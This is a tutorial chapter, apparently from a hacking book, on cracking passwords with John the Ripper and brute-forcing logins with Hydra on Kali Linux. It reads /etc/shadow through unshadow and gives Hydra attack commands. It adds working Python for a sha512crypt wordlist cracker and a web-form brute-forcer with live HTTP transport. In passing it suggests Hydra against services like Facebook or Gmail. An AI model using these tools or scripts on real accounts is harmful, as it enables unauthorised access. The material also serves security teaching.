Cracking Passwords
Passwords. If only we knew everyone else's, and no one knew our own.
At the end of the information-processing chain sits the user, who primarily keeps data on a computer safe with a password. But just as there is a tool to pick any lock, there is a tool to crack (almost) any password. In this section, we will highlight two very potent and very modern tools that hackers use to find passwords.
6.1 Cracking Passwords with John the Ripper
Let me introduce you to John the Ripper. This free password cracking tool was initially built for the Unix operating system. It works so well that it is now available on over 15 different platforms.
John the Ripper is a password testing and breaking tool that combines several cracking techniques in one package, autodetects the password hash type it is given, and even lets you build a customized cracker. It is a formidable tool for breaking many of the password hash formats used on Unix-based operating systems (note that these are hashes, not encrypted passwords: John does not decrypt anything, it guesses candidates and hashes them until one matches). Extensibility features such as support for MD4-based passwords and for hashes stored in LDAP or MySQL make John the Ripper one of the most popular tools among blackhat and whitehat hackers alike.
Step 1: Preparation
The Linux operating system stores password hashes, not the passwords themselves, in the file /etc/shadow, which only root can read. For this exercise, we are going to create a new user, let the system write that user's hash into the shadow file, and then attempt to crack it using John the Ripper. We will create the user 'admin' on the Kali Linux system with the simple password 'password123'.
root@kali:~# adduser admin
Adding user `admin' ...
Adding new group `admin' (1000) ...
Adding new user `admin' (1000) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
	Full Name []:
	Room Number []:
	Work Phone []:
	Home Phone []:
	Other []:
Is the information correct? [Y/n] y
root@kali:~#
Step 2: Unshadowing the password file
Next, we will use the unshadow command to combine the data in /etc/passwd and /etc/shadow into a single file holding the username and password hash of every account, including the one we will attempt to crack with John the Ripper. Because /etc/shadow is readable only by root, run this step as root. We will name the output file usr.
root@kali:~# unshadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
root@kali:~# unshadow /etc/passwd /etc/shadow > ~/usr
Step 3: Crack the password with a wordlist
The new file will now be cracked by John the Ripper. We will use the password list that comes with the tool on Kali Linux. The list is stored at:
/usr/share/john/password.lst
In the future, you will be able to generate your own wordlist to crack a user's password. Enter the following command:
root@kali:~# john --wordlist=/usr/share/john/password.lst ~/usr
Loaded 2 password hashes with 2 different salts (sha512crypt [64/64])
password123      (admin)
guesses: 1  time: 0:00:00:21 DONE (Wed Jan 11 07:21:08 2017)  c/s: 300  trying: sss
Use the "--show" option to display all of the cracked passwords reliably
root@kali:~#
John the Ripper was able to crack the hash and recover the password 'password123' for the user 'admin'. This was possible because 'password123' was one of the candidates in the password list. If the actual password were not on the list, the wordlist attack would have failed, no matter how long it ran.
Step 4: Cracking a password without a wordlist
It is possible to use John the Ripper to crack a password without providing a list of possible passwords. As a budding hacker, you will want to try this and see whether the method actually works.
On your Kali terminal, enter the following command:
root@kali:~# john ~/filename
The ~/filename in the command above represents the file where the password hashes are stored, such as the ~/usr file produced in Step 2.
According to the documentation at http://www.openwall.com/john/doc/MODES.shtml, when no mode is specified John the Ripper tries 'single crack' mode first (guesses derived from the account's own username and GECOS fields), then wordlist mode with its mangling rules, and if that is not successful switches to 'incremental' mode, which tries character combinations exhaustively and can run for a very long time.
I should point out that your installation of Kali Linux comes with another password cracking tool called Ncrack. To find it, navigate to Kali Linux's list of tools by clicking Applications > Password Attacks. Ncrack is right there. It is described as a high-speed network authentication cracking tool designed to help companies secure their networks proactively by testing all their hosts and network devices for poor passwords. Unlike John the Ripper, which works offline on hashes you have already obtained, Ncrack sends login attempts to live services over the network. You can read more about this tool at http://tools.kali.org/password-attacks/ncrack.
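To make the wordlist attack of Steps 2 and 3 concrete, here is an added example in Python. It is not code from this book and not John the Ripper's own code: it reimplements the sha512crypt algorithm that produces the $6$ hashes john reported loading, parses an unshadow-style file, and tries each word of a list against every account with that account's own salt. The unshadow lines, the salts and the short wordlist are constructed for the example; the pair 'Hello world!' with salt 'saltstring' is a published test vector from the sha512crypt specification, so the hash function can be checked independently.

```python
import hashlib
import re

# sha512crypt, the "$6$" format in /etc/shadow, as specified by Ulrich Drepper:
# 5000 chained SHA-512 rounds by default, salt limited to 16 characters.
B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Byte order in which the final digest is encoded (from the specification).
ENCODE_ORDER = [
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4), (47, 5, 26),
    (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51), (31, 52, 10), (53, 11, 32),
    (12, 33, 54), (34, 55, 13), (56, 14, 35), (15, 36, 57), (37, 58, 16), (59, 17, 38),
    (18, 39, 60), (40, 61, 19), (62, 20, 41),
]


def _b64_from_24bit(b2, b1, b0, n):
    """Emit n crypt-style base64 characters from three bytes, low bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += B64[w & 0x3F]
        w >>= 6
    return out


def sha512_crypt(password, salt, rounds=5000):
    """Return the full '$6$salt$hash' string for password, as /etc/shadow stores it."""
    pw = password.encode()
    salt = salt.encode()[:16]
    b = hashlib.sha512(pw + salt + pw).digest()          # digest B
    a = hashlib.sha512(pw + salt)                         # digest A ...
    n = len(pw)
    while n > 64:                                         # ... plus B per 64 bytes of pw
        a.update(b)
        n -= 64
    a.update(b[:n])
    n = len(pw)
    while n > 0:                                          # ... plus B or pw per length bit
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    dp = hashlib.sha512(pw * len(pw)).digest()            # P: password-derived bytes
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]
    ds = hashlib.sha512(salt * (16 + a[0])).digest()      # S: salt-derived bytes
    s = (ds * (len(salt) // 64 + 1))[:len(salt)]
    c = a
    for i in range(rounds):                               # the expensive part
        h = hashlib.sha512()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    encoded = "".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in ENCODE_ORDER)
    encoded += _b64_from_24bit(0, 0, c[63], 2)
    prefix = "$6$" if rounds == 5000 else "$6$rounds=%d$" % rounds
    return prefix + salt.decode() + "$" + encoded


SHADOW_HASH = re.compile(r"^\$6\$(?:rounds=(\d+)\$)?([^$:]{1,16})\$([./0-9A-Za-z]{86})$")


def load_hashes(unshadow_text):
    """Parse unshadow output (passwd layout, hash in field 2) into
    (user, rounds, salt, digest) tuples, skipping locked or hashless accounts."""
    targets = []
    for line in unshadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        m = SHADOW_HASH.match(fields[1])
        if m:
            rounds = int(m.group(1)) if m.group(1) else 5000
            targets.append((fields[0], rounds, m.group(2), m.group(3)))
    return targets


def crack_wordlist(unshadow_text, wordlist):
    """Wordlist attack: hash every candidate with the account's salt and compare.
    Returns {user: password or None}; None means the password was not in the list."""
    results = {}
    for user, rounds, salt, digest in load_hashes(unshadow_text):
        results[user] = None
        for candidate in wordlist:
            if sha512_crypt(candidate, salt, rounds).rsplit("$", 1)[1] == digest:
                results[user] = candidate
                break
    return results


# Constructed stand-in for ~/usr: root is locked ("*"), admin has the chapter's
# password, bob has a password deliberately absent from the wordlist.
SAMPLE_UNSHADOW = "\n".join([
    "root:*:0:0:root:/root:/bin/bash",
    "admin:" + sha512_crypt("password123", "pqR7xJ2b") + ":1000:1000:,,,:/home/admin:/bin/bash",
    "bob:" + sha512_crypt("Hello world!", "saltstring") + ":1001:1001:,,,:/home/bob:/bin/bash",
])
SAMPLE_WORDLIST = ["123456", "password", "letmein", "password123", "qwerty"]  # constructed

if __name__ == "__main__":
    for user, found in crack_wordlist(SAMPLE_UNSHADOW, SAMPLE_WORDLIST).items():
        print(user, found if found else "(not in wordlist)")
```

Running it reports password123 for admin and "(not in wordlist)" for bob, which is the failure described in Step 3: a wordlist attack cannot recover a password the list does not contain. Each candidate costs 5000 chained SHA-512 computations per account, which is why the salt is re-read for every user and why john's own speed figure above is only in the hundreds of candidates per second.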
6.2 Cracking Passwords with Hydra
Best known as 'THC-Hydra', Hydra is a powerful online password attack tool: rather than working on hashes you have already captured, it sends login attempts directly to live network services such as HTTP, HTTPS, SMTP, SNMP, SSH, SMB and Telnet, among others. This tool supports over 30 protocols, including those secured with SSL, and brute-forces services using wordlists and userlists.
Hydra has four working modes, selected by which of the -l/-L and -p/-P options you combine:
1. One username and one password (-l user -p password).
2. A userlist and one password (-L userfile -p password).
3. One username and a password list (-l user -P passfile).
4. A userlist and a password list (-L userfile -P passfile).
What makes Hydra a one-of-a-kind password cracking tool is that it is a fast, parallel connection bruteforcer that is also flexible, with new protocol modules regularly added and easy to install. There are lots of password lists out there that a hacker such as yourself will become familiar with; you can find them with a simple Google search.
6.2.1 Understanding the Hydra Command
For a dictionary attack to work, no matter which tool you use, you need a list of candidate passwords for the software to try. Hydra reads the same plain-text format John the Ripper uses, one password per line, so you can also point it at the password list that comes with John.
You can find Hydra on Kali Linux by going to Applications >Password Attacks > Online Attacks > Hydra. When you click it, it should open on the terminal. Alternatively, you can easily use the command hydra on the terminal to initiate this tool.
If Hydra is not pre-installed on your version of Kali Linux, you can set it up by entering:
apt-get install hydra
The separate hydra-gtk package adds the graphical front end (xHydra) on top of the command-line tool.
Hydra uses the following command format for a typical basic attack:
hydra -l username -P passwordlist target service
The username is a single username such as "user" or "admin" (-l), or a file containing a list of usernames (-L). The passwordlist is a text file with one candidate password per line (-P); a single password is given with lowercase -p instead. The target is the host that authenticates the credentials, given as an IP address or hostname (add -s port when the service does not listen on its default port), and service is the protocol module to attack, such as ssh, ftp or http-post-form. The service may also be written as a URL prefix, for example ssh://192.168.0.1.
You can check the password lists that come with Kali Linux by default in the directory /usr/share/wordlists, first changing to the directory:
root@kali:~# cd /usr/share/wordlists
Then listing its contents:
root@kali:/usr/share/wordlists# ls
dirb       dnsmap.txt     fern-wifi       metasploit-pro  sqlmap    wfuzz.txt
dirbuster  fasttrack.txt  metasploit-jtr  nmap.lst        w3af.txt
To use Hydra to crack a password, use the command format illustrated above, replacing the placeholders username, passwordlist, target and service with actual information. For instance, an attack against a web server listening on port 8080 would be structured like this (the IP address and the wordlist file name are placeholders for your own target and list):
root@kali:/usr/share/wordlists# hydra -l admin -P /usr/share/wordlists/mypasswords.txt -s 8080 192.168.0.0 http-get /
6.2.2 Using Hydra on web forms
There is a level of complexity in using Hydra on web forms because you have to provide the extra parameters that the form needs. However, the syntax is much the same as above.
To use Hydra on a web form, you need the host plus three more things: the URL path of the login page, the form parameters (with ^USER^ and ^PASS^ marking where Hydra substitutes each username and password), and a failure string. This means your command would be structured like this:
hydra -l username -P passwordlist <host> http-post-form "<path>:<form parameters>:<failure string>"
Unfortunately, using Hydra on a web form in depth is beyond the scope of this book. We could go into detail with demonstrations and examples, but this tool alone would need an entire book to cover how you can use it against Facebook, Gmail, or any other formidable online service.
The most critical of the parameters required to attack a web form with Hydra is the failure string. This is the text that the form returns when Hydra submits an incorrect username and/or password combination. This information is vital because Hydra treats an attempt as successful whenever the failure string is absent from the response: a failure string that never appears (a typo, or a message that changed) makes every attempt look like a hit, while a string that also appears on the success page makes Hydra miss the valid credentials. Always log in once by hand with a wrong password and copy the exact message the page shows.
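As an added example, not code from this book and not Hydra's own code, the following Python reproduces the logic behind Hydra's four username/password modes and the failure-string check of its http-post-form module. The login page, its field names (user and pass), the failure message, the valid account and the candidate list are constructed stand-ins so the code runs offline; http_post is the real transport you would substitute for a live target. The second run shows what happens when the failure string is wrong.

```python
import itertools
import urllib.parse
import urllib.request


def http_post(url, fields, timeout=10):
    """Live transport: POST the form fields and return the response body as text.
    Not used by the offline runs below, which call fake_post instead."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def brute_force_form(post, url, users, passwords, user_field, pass_field,
                     failure_string=None, success_string=None, stop_on_first=True):
    """Try every username/password pair against a login form the way Hydra's
    http-post-form module does. A one-element list is Hydra's -l / -p; a longer
    list is -L / -P. An attempt counts as a hit when failure_string is absent
    from the response (Hydra's default F= condition) or, if success_string is
    given instead, when that text is present (Hydra's S= condition).
    Returns (list of (user, password) hits, number of attempts made)."""
    if (failure_string is None) == (success_string is None):
        raise ValueError("specify exactly one of failure_string or success_string")
    hits = []
    attempts = 0
    for user, password in itertools.product(users, passwords):
        attempts += 1
        body = post(url, {user_field: user, pass_field: password})
        if failure_string is not None:
            success = failure_string not in body
        else:
            success = success_string in body
        if success:
            hits.append((user, password))
            if stop_on_first:          # like hydra -f: stop after the first valid pair
                break
    return hits, attempts


# Constructed stand-in for the target login page so the example runs offline.
VALID_CREDENTIALS = {"admin": "password123"}


def fake_post(url, fields):
    """Simulated login endpoint: one fixed account, one fixed failure message."""
    if VALID_CREDENTIALS.get(fields["user"]) == fields["pass"]:
        return "<h1>Welcome, %s</h1>" % fields["user"]
    return "<p>Login failed: invalid username or password</p>"


CANDIDATES = ["123456", "password", "password123", "qwerty"]   # constructed wordlist
TARGET = "http://192.168.0.0:8080/login"                       # placeholder URL


def demo_userlist_mode():
    """-L/-P mode: two usernames against the candidate list, correct failure string."""
    return brute_force_form(fake_post, TARGET, ["root", "admin"], CANDIDATES,
                            "user", "pass", failure_string="Login failed")


def demo_wrong_failure_string():
    """Same attack with a failure string that never appears in the page (wrong case):
    the very first guess is misreported as valid, the classic Hydra mistake."""
    return brute_force_form(fake_post, TARGET, ["admin"], CANDIDATES,
                            "user", "pass", failure_string="Invalid")


if __name__ == "__main__":
    print(demo_userlist_mode())            # ([('admin', 'password123')], 7)
    print(demo_wrong_failure_string())     # ([('admin', '123456')], 1)
```

The first run walks all four root guesses and then the admin guesses in order, stopping at the seventh attempt when the response no longer contains "Login failed". The second run finds "Invalid" missing from the real failure page (which says "invalid") and so declares the first pair a hit; Hydra behaves the same way, which is why the failure string must be copied exactly from a real failed login.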
You can read more and discover the many features, and practical examples of using Hydra and its advanced features on the Kali Linux web page here:
http://tools.kali.org/password-attacks/hydra